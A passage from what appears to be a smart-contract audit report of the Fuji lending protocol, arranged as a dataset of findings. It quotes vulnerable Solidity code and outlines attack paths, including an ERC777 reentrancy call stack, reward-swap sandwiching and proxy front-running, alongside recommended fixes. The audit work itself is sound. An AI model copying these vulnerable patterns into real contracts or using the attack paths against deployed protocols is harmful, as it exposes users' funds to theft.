means to pause certain flash loan providers.\\nEnsure that flash loan handler functions should never re-enter the system. This provides additional security guarantees in case a flash loan provider gets breached.\\nNote: The Fuji development team implemented a hotfix to prevent unsolicited calls from Cream by storing the `hash(FlashLoan.info)` in a state variable just before requesting the flash loan. Inside the `onFlashLoan` callback, this state is validated and cleared accordingly.\\nAn improvement to this hotfix would be, to check `_paramsHash` before any external calls are made and clear it right after validation at the beginning of the function. Additionally, `hash==0x0` should be explicitly disallowed. By doing so, the check also serves as a reentrancy guard and helps further reduce the risk of a potentially malicious flash loan re-entering the function.чч```\\n/\\*\\*\\n \\* @dev Routing Function for Flashloan Provider\\n \\* @param info: struct information for flashLoan\\n \\* @param \\_flashnum: integer identifier of flashloan provider\\n \\*/\\nfunction initiateFlashloan(FlashLoan.Info calldata info, uint8 \\_flashnum) external isAuthorized override {\\n if (\\_flashnum == 0) {\\n \\_initiateGeistFlashLoan(info);\\n } else if (\\_flashnum == 2) {\\n \\_initiateCreamFlashLoan(info);\\n } else {\\n revert(Errors.VL\\_INVALID\\_FLASH\\_NUMBER);\\n }\\n}\\n```\\n -Lack of reentrancy protection in token interactionsчhighчToken operations may potentially re-enter the system. For example, `univTransfer` may perform a low-level `to.call{value}()` and, depending on the token's specification (e.g. `ERC-20` extension or `ERC-20` compliant ERC-777), `token` may implement callbacks when being called as `token.safeTransfer(to, amount)` (or token.transfer*()).\\nTherefore, it is crucial to strictly adhere to the checks-effects pattern and safeguard affected methods using a mutex.\\n```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isFTM(token)) {\\n (bool sent, ) = to.call{ value: amount }(\"\");\\n require(sent, \"Failed to send Ether\");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n\\n`withdraw` is `nonReentrant` while `paybackAndWithdraw` is not, which appears to be inconsistent\\n```\\n/\\*\\*\\n \\* @dev Paybacks the underlying asset and withdraws collateral in a single function call from activeProvider\\n \\* @param \\_paybackAmount: amount of underlying asset to be payback, pass -1 to pay full amount\\n \\* @param \\_collateralAmount: amount of collateral to be withdrawn, pass -1 to withdraw maximum amount\\n \\*/\\nfunction paybackAndWithdraw(int256 \\_paybackAmount, int256 \\_collateralAmount) external payable {\\n updateF1155Balances();\\n \\_internalPayback(\\_paybackAmount);\\n \\_internalWithdraw(\\_collateralAmount);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* @dev Paybacks Vault's type underlying to activeProvider - called by users\\n \\* @param \\_repayAmount: token amount of underlying to repay, or\\n \\* pass any 'negative number' to repay full ammount\\n \\* Emits a {Repay} event.\\n \\*/\\nfunction payback(int256 \\_repayAmount) public payable override {\\n updateF1155Balances();\\n \\_internalPayback(\\_repayAmount);\\n}\\n```\\n\\n`depositAndBorrow` is not `nonReentrant` while `borrow()` is which appears to be inconsistent\\n```\\n/\\*\\*\\n \\* @dev Deposits collateral and borrows underlying in a single function call from activeProvider\\n \\* @param \\_collateralAmount: amount to be deposited\\n \\* @param \\_borrowAmount: amount to be borrowed\\n \\*/\\nfunction depositAndBorrow(uint256 \\_collateralAmount, uint256 \\_borrowAmount) external payable {\\n updateF1155Balances();\\n \\_internalDeposit(\\_collateralAmount);\\n \\_internalBorrow(\\_borrowAmount);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* @dev Borrows Vault's type underlying amount from activeProvider\\n \\* @param \\_borrowAmount: token amount of underlying to borrow\\n \\* Emits a {Borrow} event.\\n \\*/\\nfunction borrow(uint256 \\_borrowAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalBorrow(\\_borrowAmount);\\n}\\n```\\n\\nHere's an example call stack for `depositAndBorrow` that outlines how a reentrant `ERC20` token (e.g. ERC777) may call back into `depositAndBorrow` again, `updateBalances` twice in the beginning before tokens are even transferred and then continues to call `internalDeposit`, `internalBorrow`, `internalBorrow` without an update before the 2nd borrow. Note that both `internalDeposit` and `internalBorrow` read indexes that may now be outdated.\\n```\\ndepositAndBorrow\\n updateBalances\\n internalDeposit ->\\n ERC777(collateralAsset).safeTransferFrom() ---> calls back!\\n ---callback:beforeTokenTransfer---->\\n !! depositAndBorrow\\n updateBalances\\n internalDeposit\\n --> ERC777.safeTransferFrom()\\n <--\\n \\_deposit\\n mint\\n internalBorrow\\n mint\\n \\_borrow\\n ERC777(borrowAsset).univTransfer(msg.sender) --> might call back\\n\\n <-------------------------------\\n \\_deposit\\n mint\\n internalBorrow\\n mint\\n \\_borrow \\n --> ERC777(borrowAsset).univTransfer(msg.sender) --> might call back\\n <--\\n```\\nчConsider decorating methods that may call back to untrusted sources (i.e., native token transfers, callback token operations) as `nonReentrant` and strictly follow the checks-effects pattern for all contracts in the code-base.чч```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isFTM(token)) {\\n (bool sent, ) = to.call{ value: amount }(\"\");\\n require(sent, \"Failed to send Ether\");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n -Unchecked Return Values - ICErc20 repayBorrowчhighч`ICErc20.repayBorrow` returns a non-zero uint on error. Multiple providers do not check for this error condition and might return `success` even though `repayBorrow` failed, returning an error code.\\nThis can potentially allow a malicious user to call `paybackAndWithdraw()` while not repaying by causing an error in the sub-call to `Compound.repayBorrow()`, which ends up being silently ignored. Due to the missing success condition check, execution continues normally with `_internalWithdraw()`.\\nAlso, see issue 4.5.\\n```\\nfunction repayBorrow(uint256 repayAmount) external returns (uint256);\\n```\\n\\nThe method may return an error due to multiple reasons:\\n```\\nfunction repayBorrowInternal(uint repayAmount) internal nonReentrant returns (uint, uint) {\\n uint error = accrueInterest();\\n if (error != uint(Error.NO\\_ERROR)) {\\n // accrueInterest emits logs on errors, but we still want to log the fact that an attempted borrow failed\\n return (fail(Error(error), FailureInfo.REPAY\\_BORROW\\_ACCRUE\\_INTEREST\\_FAILED), 0);\\n }\\n // repayBorrowFresh emits repay-borrow-specific logs on errors, so we don't need to\\n return repayBorrowFresh(msg.sender, msg.sender, repayAmount);\\n}\\n```\\n\\n```\\nif (allowed != 0) {\\n return (failOpaque(Error.COMPTROLLER\\_REJECTION, FailureInfo.REPAY\\_BORROW\\_COMPTROLLER\\_REJECTION, allowed), 0);\\n}\\n\\n/\\* Verify market's block number equals current block number \\*/\\nif (accrualBlockNumber != getBlockNumber()) {\\n return (fail(Error.MARKET\\_NOT\\_FRESH, FailureInfo.REPAY\\_BORROW\\_FRESHNESS\\_CHECK), 0);\\n}\\n\\nRepayBorrowLocalVars memory vars;\\n\\n/\\* We remember the original borrowerIndex for verification purposes \\*/\\nvars.borrowerIndex = accountBorrows[borrower].interestIndex;\\n\\n/\\* We fetch the amount the borrower owes, with accumulated interest \\*/\\n(vars.mathErr, vars.accountBorrows) = borrowBalanceStoredInternal(borrower);\\nif (vars.mathErr != MathError.NO\\_ERROR) {\\n return (failOpaque(Error.MATH\\_ERROR, FailureInfo.REPAY\\_BORROW\\_ACCUMULATED\\_BALANCE\\_CALCULATION\\_FAILED, uint(vars.mathErr)), 0);\\n}\\n```\\n\\nMultiple providers, here are some examples:\\n```\\n // Check there is enough balance to pay\\n require(erc20token.balanceOf(address(this)) >= \\_amount, \"Not-enough-token\");\\n erc20token.univApprove(address(cyTokenAddr), \\_amount);\\n cyToken.repayBorrow(\\_amount);\\n}\\n```\\n\\n```\\nrequire(erc20token.balanceOf(address(this)) >= \\_amount, \"Not-enough-token\");\\nerc20token.univApprove(address(cyTokenAddr), \\_amount);\\ncyToken.repayBorrow(\\_amount);\\n```\\n\\n```\\nif (\\_isETH(\\_asset)) {\\n // Create a reference to the corresponding cToken contract\\n ICEth cToken = ICEth(cTokenAddr);\\n\\n cToken.repayBorrow{ value: msg.value }();\\n} else {\\n // Create reference to the ERC20 contract\\n IERC20 erc20token = IERC20(\\_asset);\\n\\n // Create a reference to the corresponding cToken contract\\n ICErc20 cToken = ICErc20(cTokenAddr);\\n\\n // Check there is enough balance to pay\\n require(erc20token.balanceOf(address(this)) >= \\_amount, \"Not-enough-token\");\\n erc20token.univApprove(address(cTokenAddr), \\_amount);\\n cToken.repayBorrow(\\_amount);\\n}\\n```\\nчCheck for `cyToken.repayBorrow(_amount) != 0` or `Error.NO_ERROR`.чч```\\nfunction repayBorrow(uint256 repayAmount) external returns (uint256);\\n```\\n -Unchecked Return Values - IComptroller exitMarket, enterMarketчhighч`IComptroller.exitMarket()`, `IComptroller.enterMarkets()` may return a non-zero uint on error but none of the Providers check for this error condition. Together with issue 4.10, this might suggest that unchecked return values may be a systemic problem.\\nHere's the upstream implementation:\\n```\\nif (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n}\\n\\n/\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\nuint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\nif (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n}\\n```\\n\\n```\\n /\\*\\*\\n \\* @notice Removes asset from sender's account liquidity calculation\\n \\* @dev Sender must not have an outstanding borrow balance in the asset,\\n \\* or be providing necessary collateral for an outstanding borrow.\\n \\* @param cTokenAddress The address of the asset to be removed\\n \\* @return Whether or not the account successfully exited the market\\n \\*/\\n function exitMarket(address cTokenAddress) external returns (uint) {\\n CToken cToken = CToken(cTokenAddress);\\n /\\* Get sender tokensHeld and amountOwed underlying from the cToken \\*/\\n (uint oErr, uint tokensHeld, uint amountOwed, ) = cToken.getAccountSnapshot(msg.sender);\\n require(oErr == 0, \"exitMarket: getAccountSnapshot failed\"); // semi-opaque error code\\n\\n /\\* Fail if the sender has a borrow balance \\*/\\n if (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n }\\n\\n /\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\n uint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\n if (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n }\\n```\\n\\nUnchecked return value `exitMarket`\\nAll Providers exhibit the same issue, probably due to code reuse. (also see https://github.com/ConsenSysDiligence/fuji-protocol-audit-2022-02/issues/19). Some examples:\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cTokenAddress);\\n}\\n```\\n\\n```\\nfunction \\_exitCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n comptroller.exitMarket(\\_cyTokenAddress);\\n}\\n```\\n\\nUnchecked return value `enterMarkets` (Note that `IComptroller` returns `NO_ERROR` when already joined to `enterMarkets`.\\nAll Providers exhibit the same issue, probably due to code reuse. (also see https://github.com/ConsenSysDiligence/fuji-protocol-audit-2022-02/issues/19). For example:\\n```\\nfunction \\_enterCollatMarket(address \\_cyTokenAddress) internal {\\n // Create a reference to the corresponding network Comptroller\\n IComptroller comptroller = IComptroller(\\_getComptrollerAddress());\\n\\n address[] memory cyTokenMarkets = new address[](1);\\n cyTokenMarkets[0] = \\_cyTokenAddress;\\n comptroller.enterMarkets(cyTokenMarkets);\\n}\\n```\\nчRequire that return value is `ERROR.NO_ERROR` or `0`.чч```\\nif (amountOwed != 0) {\\n return fail(Error.NONZERO\\_BORROW\\_BALANCE, FailureInfo.EXIT\\_MARKET\\_BALANCE\\_OWED);\\n}\\n\\n/\\* Fail if the sender is not permitted to redeem all of their tokens \\*/\\nuint allowed = redeemAllowedInternal(cTokenAddress, msg.sender, tokensHeld);\\nif (allowed != 0) {\\n return failOpaque(Error.REJECTION, FailureInfo.EXIT\\_MARKET\\_REJECTION, allowed);\\n}\\n```\\n -Fliquidator - excess funds of native tokens are not returnedчmediumч`FliquidatorFTM.batchLiquidate` accepts the `FTM` native token and checks if at least an amount of `debtTotal` was provided with the call. The function continues using the `debtTotal` value. If a caller provides msg.value > `debtTotal`, excess funds are not returned and remain in the contract. `FliquidatorFTM` is not upgradeable, and there is no way to recover the surplus funds.\\n```\\nif (vAssets.borrowAsset == FTM) {\\n require(msg.value >= debtTotal, Errors.VL\\_AMOUNT\\_ERROR);\\n} else {\\n```\\nчConsider returning excess funds. Consider making `_constructParams` public to allow the caller to pre-calculate the `debtTotal` that needs to be provided with the call.\\nConsider removing support for native token `FTM` entirely to reduce the overall code complexity. The wrapped equivalent can be used instead.чч```\\nif (vAssets.borrowAsset == FTM) {\\n require(msg.value >= debtTotal, Errors.VL\\_AMOUNT\\_ERROR);\\n} else {\\n```\\n -Unsafe arithmetic castsчmediumчThe reason for using signed integers in some situations appears to be to use negative values as an indicator to withdraw everything. Using a whole bit of uint256 for this is quite a lot when using `type(uint256).max` would equal or better serve as a flag to withdraw everything.\\nFurthermore, even though the code uses `solidity 0.8.x`, which safeguards arithmetic operations against under/overflows, arithmetic typecast is not protected.\\nAlso, see issue 4.9 for a related issue.\\n```\\n⇒ solidity-shell\\n\\n🚀 Entering interactive Solidity ^0.8.11 shell. '.help' and '.exit' are your friends.\\n » ℹ️ ganache-mgr: starting temp. ganache instance // rest of code\\n » uint(int(-100))\\n115792089237316195423570985008687907853269984665640564039457584007913129639836\\n » int256(uint(2\\*\\*256-100))\\n-100\\n```\\n\\n```\\n// Compute how much collateral needs to be swapt\\nuint256 collateralInPlay = \\_getCollateralInPlay(\\n vAssets.collateralAsset,\\n vAssets.borrowAsset,\\n debtTotal + bonus\\n);\\n\\n// Burn f1155\\n\\_burnMulti(addrs, borrowBals, vAssets, \\_vault, f1155);\\n\\n// Withdraw collateral\\nIVault(\\_vault).withdrawLiq(int256(collateralInPlay));\\n```\\n\\n```\\n// Compute how much collateral needs to be swapt for all liquidated users\\nuint256 collateralInPlay = \\_getCollateralInPlay(\\n vAssets.collateralAsset,\\n vAssets.borrowAsset,\\n \\_amount + \\_flashloanFee + bonus\\n);\\n\\n// Burn f1155\\n\\_burnMulti(\\_addrs, \\_borrowBals, vAssets, \\_vault, f1155);\\n\\n// Withdraw collateral\\nIVault(\\_vault).withdrawLiq(int256(collateralInPlay));\\n```\\n\\n```\\nuint256 amount = \\_amount < 0 ? debtTotal : uint256(\\_amount);\\n```\\n\\n```\\nfunction withdrawLiq(int256 \\_withdrawAmount) external override nonReentrant onlyFliquidator {\\n // Logic used when called by Fliquidator\\n \\_withdraw(uint256(\\_withdrawAmount), address(activeProvider));\\n IERC20Upgradeable(vAssets.collateralAsset).univTransfer(\\n payable(msg.sender),\\n uint256(\\_withdrawAmount)\\n );\\n}\\n```\\n\\npot. unsafe truncation (unlikely)\\n```\\nfunction updateState(uint256 \\_assetID, uint256 newBalance) external override onlyPermit {\\n uint256 total = totalSupply(\\_assetID);\\n if (newBalance > 0 && total > 0 && newBalance > total) {\\n uint256 newIndex = (indexes[\\_assetID] \\* newBalance) / total;\\n indexes[\\_assetID] = uint128(newIndex);\\n }\\n}\\n```\\nчIf negative values are only used as a flag to indicate that all funds should be used for an operation, use `type(uint256).max` instead. It is wasting less value-space for a simple flag than using the uint256 high-bit range. Avoid typecast where possible. Use `SafeCast` instead or verify that the casts are safe because the values they operate on cannot under- or overflow. Add inline code comments if that's the case.чч```\\n⇒ solidity-shell\\n\\n🚀 Entering interactive Solidity ^0.8.11 shell. '.help' and '.exit' are your friends.\\n » ℹ️ ganache-mgr: starting temp. ganache instance // rest of code\\n » uint(int(-100))\\n115792089237316195423570985008687907853269984665640564039457584007913129639836\\n » int256(uint(2\\*\\*256-100))\\n-100\\n```\\n -Missing input validation on flash close fee factorsчmediumчThe `FliquidatorFTM` contract allows authorized parties to set the flash close fee factor. The factor is provided as two integers denoting numerator and denominator. Due to a lack of boundary checks, it is possible to set unrealistically high factors, which go well above 1. This can have unexpected effects on internal accounting and the impact of flashloan balances.\\n```\\nfunction setFlashCloseFee(uint64 \\_newFactorA, uint64 \\_newFactorB) external isAuthorized {\\n flashCloseF.a = \\_newFactorA;\\n flashCloseF.b = \\_newFactorB;\\n```\\nчAdd a requirement making sure that `flashCloseF.a <= flashCloseF.b`.чч```\\nfunction setFlashCloseFee(uint64 \\_newFactorA, uint64 \\_newFactorB) external isAuthorized {\\n flashCloseF.a = \\_newFactorA;\\n flashCloseF.b = \\_newFactorB;\\n```\\n -Separation of concerns and consistency in vaultsчmediumчThe `FujiVaultFTM` contract contains multiple balance-changing functions. Most notably, `withdraw` is passed an `int256` denoted amount parameter. Negative values of this parameter are given to the `_internalWithdraw` function, where they trigger the withdrawal of all collateral. This approach can result in accounting mistakes in the future as beyond a certain point in the vault's accounting; amounts are expected to be only positive. Furthermore, the concerns of withdrawing and entirely withdrawing are not separated.\\nThe above issue applies analogously to the `payback` function and its dependency on `_internalPayback`.\\nFor consistency, `withdrawLiq` also takes an `int256` amount parameter. This function is only accessible to the `Fliquidator` contract and withdraws collateral from the active provider. However, all occurrences of the `_withdrawAmount` parameter are cast to `uint256`.\\nThe `withdraw` entry point:\\n```\\nfunction withdraw(int256 \\_withdrawAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalWithdraw(\\_withdrawAmount);\\n}\\n```\\n\\n_internalWithdraw's negative amount check:\\n```\\nuint256 amountToWithdraw = \\_withdrawAmount < 0\\n ? providedCollateral - neededCollateral\\n : uint256(\\_withdrawAmount);\\n```\\n\\nThe `withdrawLiq` entry point for the Fliquidator:\\n```\\nfunction withdrawLiq(int256 \\_withdrawAmount) external override nonReentrant onlyFliquidator {\\n // Logic used when called by Fliquidator\\n \\_withdraw(uint256(\\_withdrawAmount), address(activeProvider));\\n IERC20Upgradeable(vAssets.collateralAsset).univTransfer(\\n payable(msg.sender),\\n uint256(\\_withdrawAmount)\\n );\\n}\\n```\\nчWe recommend splitting the `withdraw(int256)` function into two: `withdraw(uint256)` and `withdrawAll()`. These will provide the same functionality while rendering the updated code of `_internalWithdraw` easier to read, maintain, and harder to manipulate. The recommendation applies to `payback` and `_internalPayback`.\\nSimilarly, withdrawLiq's parameter should be a `uint256` to prevent unnecessary casts.чч```\\nfunction withdraw(int256 \\_withdrawAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalWithdraw(\\_withdrawAmount);\\n}\\n```\\n -Aave/Geist Interface declaration mismatch and unchecked return valuesчmediumчThe two lending providers, Geist & Aave, do not seem to be directly affiliated even though one is a fork of the other. However, the interfaces may likely diverge in the future. Using the same interface declaration for both protocols might become problematic with future upgrades to either protocol. The interface declaration does not seem to come from the original upstream project. The interface `IAaveLendingPool` does not declare any return values while some of the functions called in Geist or Aave return them.\\nNote: that we have not verified all interfaces for correctness. However, we urge the client to only use official interface declarations from the upstream projects and verify that all other interfaces match.\\nThe `ILendingPool` configured in `ProviderAave` (0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5 -> implementation: 0xc6845a5c768bf8d7681249f8927877efda425baf)\\n```\\nfunction \\_getAaveProvider() internal pure returns (IAaveLendingPoolProvider) {\\n return IAaveLendingPoolProvider(0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5);\\n}\\n```\\n\\nThe `IAaveLendingPool` does not declare return values for any function, while upstream does.\\n```\\n// SPDX-License-Identifier: MIT\\n\\npragma solidity ^0.8.0;\\n\\ninterface IAaveLendingPool {\\n function flashLoan(\\n address receiverAddress,\\n address[] calldata assets,\\n uint256[] calldata amounts,\\n uint256[] calldata modes,\\n address onBehalfOf,\\n bytes calldata params,\\n uint16 referralCode\\n ) external;\\n\\n function deposit(\\n address \\_asset,\\n uint256 \\_amount,\\n address \\_onBehalfOf,\\n uint16 \\_referralCode\\n ) external;\\n\\n function withdraw(\\n address \\_asset,\\n uint256 \\_amount,\\n address \\_to\\n ) external;\\n\\n function borrow(\\n address \\_asset,\\n uint256 \\_amount,\\n uint256 \\_interestRateMode,\\n uint16 \\_referralCode,\\n address \\_onBehalfOf\\n ) external;\\n\\n function repay(\\n address \\_asset,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_onBehalfOf\\n ) external;\\n\\n function setUserUseReserveAsCollateral(address \\_asset, bool \\_useAsCollateral) external;\\n}\\n```\\n\\nMethods: `withdraw()`, `repay()` return `uint256` in the original implementation for Aave, see:\\nhttps://etherscan.io/address/0xc6845a5c768bf8d7681249f8927877efda425baf#code\\nThe `ILendingPool` configured for Geist:\\nMethods `withdraw()`, `repay()` return `uint256` in the original implementation for Geist, see:\\nhttps://ftmscan.com/address/0x3104ad2aadb6fe9df166948a5e3a547004862f90#code\\nNote: that the actual `amount` withdrawn does not necessarily need to match the `amount` provided with the function argument. Here's an excerpt of the upstream LendingProvider.withdraw():\\n```\\n// rest of code\\n if (amount == type(uint256).max) {\\n amountToWithdraw = userBalance;\\n }\\n// rest of code\\n return amountToWithdraw;\\n```\\n\\nAnd here's the code in Fuji that calls that method. This will break the `withdrawAll` functionality of `LendingProvider` if token `isFTM`.\\n```\\nfunction withdraw(address \\_asset, uint256 \\_amount) external payable override {\\n IAaveLendingPool aave = IAaveLendingPool(\\_getAaveProvider().getLendingPool());\\n\\n bool isFtm = \\_asset == \\_getFtmAddr();\\n address \\_tokenAddr = isFtm ? \\_getWftmAddr() : \\_asset;\\n\\n aave.withdraw(\\_tokenAddr, \\_amount, address(this));\\n\\n // convert WFTM to FTM\\n if (isFtm) {\\n address unwrapper = \\_getUnwrapper();\\n IERC20(\\_tokenAddr).univTransfer(payable(unwrapper), \\_amount);\\n IUnwrapper(unwrapper).withdraw(\\_amount);\\n }\\n}\\n```\\n\\nSimilar for `repay()`, which returns the actual amount repaid.чAlways use the original interface unless only a minimal subset of functions is used.\\nUse the original upstream interfaces of the corresponding project (link via the respective npm packages if available).\\nAvoid omitting parts of the function declaration! Especially when it comes to return values.\\nCheck return values. Use the value returned from `withdraw()` AND `repay()`чч```\\nfunction \\_getAaveProvider() internal pure returns (IAaveLendingPoolProvider) {\\n return IAaveLendingPoolProvider(0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5);\\n}\\n```\\n -Missing slippage protection for rewards swapчmediumчIn `FujiVaultFTM.harvestRewards` a swap transaction is generated using a call to `SwapperFTM.getSwapTransaction`. In all relevant scenarios, this call uses a minimum output amount of zero, which de-facto deactivates slippage checks. Most values from harvesting rewards can thus be siphoned off by sandwiching such calls.\\n`amountOutMin` is `0`, effectively disabling slippage control in the swap method.\\n```\\ntransaction.data = abi.encodeWithSelector(\\n IUniswapV2Router01.swapExactETHForTokens.selector,\\n 0,\\n path,\\n msg.sender,\\n type(uint256).max\\n);\\n```\\n\\nOnly success required\\n```\\n// Swap rewards -> collateralAsset\\n(success, ) = swapTransaction.to.call{ value: swapTransaction.value }(swapTransaction.data);\\nrequire(success, \"failed to swap rewards\");\\n```\\nчUse a slippage check such as for liquidator swaps:\\n```\\nrequire(\\n (priceDelta \\* SLIPPAGE\\_LIMIT\\_DENOMINATOR) / priceFromOracle < SLIPPAGE\\_LIMIT\\_NUMERATOR,\\n Errors.VL\\_SWAP\\_SLIPPAGE\\_LIMIT\\_EXCEED\\n);\\n```\\n\\nOr specify a non-zero `amountOutMin` argument in calls to `IUniswapV2Router01.swapExactETHForTokens`.чч```\\ntransaction.data = abi.encodeWithSelector(\\n IUniswapV2Router01.swapExactETHForTokens.selector,\\n 0,\\n path,\\n msg.sender,\\n type(uint256).max\\n);\\n```\\n -FujiOracle - _getUSDPrice does not detect stale oracle prices; General Oracle RisksчmediumчThe external Chainlink oracle, which provides index price information to the system, introduces risk inherent to any dependency on third-party data sources. For example, the oracle could fall behind or otherwise fail to be maintained, resulting in outdated data being fed to the index price calculations. Oracle reliance has historically resulted in crippled on-chain systems, and complications that lead to these outcomes can arise from things as simple as network congestion.\\nThis is more extreme in lesser-known tokens with fewer ChainLink Price feeds to update the price frequently.\\nEnsuring that unexpected oracle return values are correctly handled will reduce reliance on off-chain components and increase the resiliency of the smart contract system that depends on them.\\nThe codebase, as is, relies on `chainLinkOracle.latestRoundData()` and does not check the `timestamp` or `answeredIn` round of the returned price.\\nHere's how the oracle is consumed, skipping any fields that would allow checking for stale data:\\n```\\n/\\*\\*\\n \\* @dev Calculates the USD price of asset.\\n \\* @param \\_asset: the asset address.\\n \\* Returns the USD price of the given asset\\n \\*/\\nfunction \\_getUSDPrice(address \\_asset) internal view returns (uint256 price) {\\n require(usdPriceFeeds[\\_asset] != address(0), Errors.ORACLE\\_NONE\\_PRICE\\_FEED);\\n\\n (, int256 latestPrice, , , ) = AggregatorV3Interface(usdPriceFeeds[\\_asset]).latestRoundData();\\n\\n price = uint256(latestPrice);\\n}\\n```\\n\\nHere's the implementation of the v0.6 FluxAggregator Chainlink feed with a note that timestamps should be checked.\\n```\\n\\* @return updatedAt is the timestamp when the round last was updated (i.e.\\n\\* answer was last computed)\\n```\\nчPerform sanity checks on the price returned by the oracle. If the price is older, not within configured limits, revert or handle in other means.\\nThe oracle does not provide any means to remove a potentially broken price-feed (e.g., by updating its address to `address(0)` or by pausing specific feeds or the complete oracle). The only way to pause an oracle right now is to deploy a new oracle contract. Therefore, consider adding minimally invasive functionality to pause the price-feeds if the oracle becomes unreliable.\\nMonitor the oracle data off-chain and intervene if it becomes unreliable.\\nOn-chain, realistically, both `answeredInRound` and `updatedAt` must be checked within acceptable bounds.\\n`answeredInRound == latestRound` - in this case, data may be assumed to be fresh while it might not be because the feed was entirely abandoned by nodes (no one starting a new round). Also, there's a good chance that many feeds won't always be super up-to-date (it might be acceptable to allow a threshold). A strict check might lead to transactions failing (race; e.g., round just timed out).\\n`roundId + threshold >= answeredInRound` - would allow a deviation of threshold rounds. This check alone might still result in stale data to be used if there are no more rounds. Therefore, this should be combined with `updatedAt + threshold >= block.timestamp`.чч```\\n/\\*\\*\\n \\* @dev Calculates the USD price of asset.\\n \\* @param \\_asset: the asset address.\\n \\* Returns the USD price of the given asset\\n \\*/\\nfunction \\_getUSDPrice(address \\_asset) internal view returns (uint256 price) {\\n require(usdPriceFeeds[\\_asset] != address(0), Errors.ORACLE\\_NONE\\_PRICE\\_FEED);\\n\\n (, int256 latestPrice, , , ) = AggregatorV3Interface(usdPriceFeeds[\\_asset]).latestRoundData();\\n\\n price = uint256(latestPrice);\\n}\\n```\\n -Unclaimed or front-runnable proxy implementationsчmediumчVarious smart contracts in the system require initialization functions to be called. The point when these calls happen is up to the deploying address. Deployment and initialization in one transaction are typically safe, but it can potentially be front-run if the initialization is done in a separate transaction.\\nA frontrunner can call these functions to silently take over the contracts and provide malicious parameters or plant a backdoor during the deployment.\\nLeaving proxy implementations uninitialized further aides potential phishing attacks where users might claim that - just because a contract address is listed in the official documentation/code-repo - a contract is a legitimate component of the system. At the same time, it is ‘only' a proxy implementation that an attacker claimed. For the end-user, it might be hard to distinguish whether this contract is part of the system or was a maliciously appropriated implementation.\\n```\\nfunction initialize(\\n address \\_fujiadmin,\\n address \\_oracle,\\n address \\_collateralAsset,\\n address \\_borrowAsset\\n) external initializer {\\n```\\n\\n`FujiVault` was initialized many days after deployment, and `FujiVault` inherits `VaultBaseUpgradeable`, which exposes a `delegatecall` that can be used to `selfdestruct` the contract's implementation.\\nAnother `FujiVault` was deployed by `deployer` initialized in a 2-step approach that can theoretically silently be front-run.\\ncode/artifacts/250-core.deploy:L2079-L2079\\n```\\n\"deployer\": \"0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148\",\\n```\\n\\nTransactions of deployer:\\nhttps://ftmscan.com/txs?a=0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148&p=2\\nThe specific contract was initialized 19 blocks after deployment.\\nhttps://ftmscan.com/address/0x8513c2db99df213887f63300b23c6dd31f1d14b0\\n\\n`FujiAdminFTM` (and others) don't seem to be initialized. (low prior; no risk other than pot. reputational damage)\\ncode/artifacts/250-core.deploy:L1-L7\\n```\\n{\\n \"FujiAdmin\": {\\n \"address\": \"0xaAb2AAfBFf7419Ff85181d3A846bA9045803dd67\",\\n \"deployer\": \"0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148\",\\n \"abi\": [\\n {\\n \"anonymous\": false,\\n```\\nчIt is recommended to use constructors wherever possible to immediately initialize proxy implementations during deploy-time. The code is only run when the implementation is deployed and affects the proxy initializations. If other initialization functions are used, we recommend enforcing deployer access restrictions or a standardized, top-level `initialized` boolean, set to `true` on the first deployment and used to prevent future initialization.\\nUsing constructors and locked-down initialization functions will significantly reduce potential developer errors and the possibility of attackers re-initializing vital system components.чч```\\nfunction initialize(\\n address \\_fujiadmin,\\n address \\_oracle,\\n address \\_collateralAsset,\\n address \\_borrowAsset\\n) external initializer {\\n```\\n -WFTM - Use of incorrect interface declarationsчlowчThe `WFTMUnwrapper` and various providers utilize the `IWETH` interface declaration for handling funds denoted in `WFTM`. However, the `WETH` and `WFTM` implementations are different. `WFTM` returns `uint256` values to indicate error conditions while the `WETH` contract does not.\\n```\\ncontract WFTMUnwrapper {\\n 